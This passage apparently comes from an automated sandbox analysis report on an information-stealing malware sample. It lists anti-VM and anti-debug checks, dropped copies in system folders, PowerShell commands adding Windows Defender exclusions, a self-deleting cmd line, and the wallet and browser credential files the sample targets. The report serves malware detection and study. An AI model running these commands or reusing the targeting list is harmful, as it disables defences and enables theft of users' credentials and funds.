                                Source: d3yngi1q.wji.exe, 00000002.00000002.1673137245.000000001C37B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                Source: dD82yUOZl5.27.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                                Source: dD82yUOZl5.27.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                                Source: dD82yUOZl5.27.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                                Source: dD82yUOZl5.27.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                                Source: dD82yUOZl5.27.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.2983468368.000001907A61A000.00000004.00000020.00020000.00000000.sdmp, d3yngi1q.wji.exe, 00000002.00000002.1666409604.000000001B855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: dD82yUOZl5.27.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                                Source: dD82yUOZl5.27.drBinary or memory string: tasks.office.comVMware20,11696494690o
                                Source: dD82yUOZl5.27.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                                Source: d3yngi1q.wji.exe, 00000002.00000002.1673137245.000000001C37B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: d3yngi1q.wji.exe, 00000002.00000002.1641016699.0000000002F41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                                Source: dD82yUOZl5.27.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                                Source: d3yngi1q.wji.exe, 00000002.00000002.1673137245.000000001C37B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                                Source: dD82yUOZl5.27.drBinary or memory string: dev.azure.comVMware20,11696494690j
                                Source: dD82yUOZl5.27.drBinary or memory string: global block list test formVMware20,11696494690
                                Source: dD82yUOZl5.27.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                                Source: dD82yUOZl5.27.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                                Source: dD82yUOZl5.27.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                                Source: dD82yUOZl5.27.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                                Source: dD82yUOZl5.27.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                                Source: dD82yUOZl5.27.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                                Source: dD82yUOZl5.27.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                                Source: dD82yUOZl5.27.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exe Process information queried: ProcessInformation

                                Anti Debugging

                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe Code function: 2_2_00007FFB4B297D00 CheckRemoteDebuggerPresent,2_2_00007FFB4B297D00
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exe Process queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe Process queried: DebugPort
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Process queried: DebugPort
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exe Process token adjusted: Debug
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe Process token adjusted: Debug
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe Process token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                                Source: C:\ProgramData\fontdrvhost.exe Process token adjusted: Debug
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exe Memory allocated: page read and write | page guard

                                HIPS / PFW / Operating System Protection Evasion

                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\fontdrvhost.exe'
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Help\Corporate\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe'
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe'
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe'
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe'
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exe Process created: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe "C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe"
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Wh2c6sgwRo.exe"
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\obsldskd\obsldskd.cmdline"
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zrf14fw5\zrf14fw5.cmdline"
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\dmMZ8RlPbE.bat"
                                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES459B.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCA62F8F92906C4C64B352C63DFBD9F59.TMP"
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4770.tmp" "c:\Windows\System32\CSC533681BDB06443E789816E6615DEB19.TMP"
                                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\System32\cmd.exe Process created: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe "C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe"
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exe Queries volume information: C:\Users\user\Desktop\Wh2c6sgwRo.exe VolumeInformation
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe Queries volume information: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeQueries volume information: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe VolumeInformation
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeQueries volume information: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\ProgramData\fontdrvhost.exeQueries volume information: C:\ProgramData\fontdrvhost.exe VolumeInformation
                                Source: C:\ProgramData\fontdrvhost.exeQueries volume information: C:\ProgramData\fontdrvhost.exe VolumeInformation
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\ProgramData\fontdrvhost.exeQueries volume information: C:\ProgramData\fontdrvhost.exe VolumeInformation
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeQueries volume information: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeQueries volume information: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe VolumeInformation
                                Source: C:\ProgramData\fontdrvhost.exeQueries volume information: C:\ProgramData\fontdrvhost.exe VolumeInformation
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeQueries volume information: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe VolumeInformation
                                Source: C:\ProgramData\fontdrvhost.exeQueries volume information: C:\ProgramData\fontdrvhost.exe VolumeInformation
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeQueries volume information: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe VolumeInformation
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.2983468368.000001907A61A000.00000004.00000020.00020000.00000000.sdmp, Wh2c6sgwRo.exe, 00000000.00000002.3007715987.000001907AAD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                                Stealing of Sensitive Information

                                Source: Yara matchFile source: 2.0.d3yngi1q.wji.exe.cf0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000002.00000000.1547271116.0000000000CF2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: d3yngi1q.wji.exe PID: 7768, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\fontdrvhost.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe, type: DROPPED
                                Source: Yara matchFile source: Wh2c6sgwRo.exe, type: SAMPLE
                                Source: Yara matchFile source: 0.0.Wh2c6sgwRo.exe.1905ff00000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000000.00000000.1418594888.000001905FF02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: Wh2c6sgwRo.exe, type: SAMPLE
                                Source: Yara matchFile source: 0.0.Wh2c6sgwRo.exe.1905ff00000.0.unpack, type: UNPACKEDPE
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\keystore
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets0Local Extension Settings
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\keystore
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
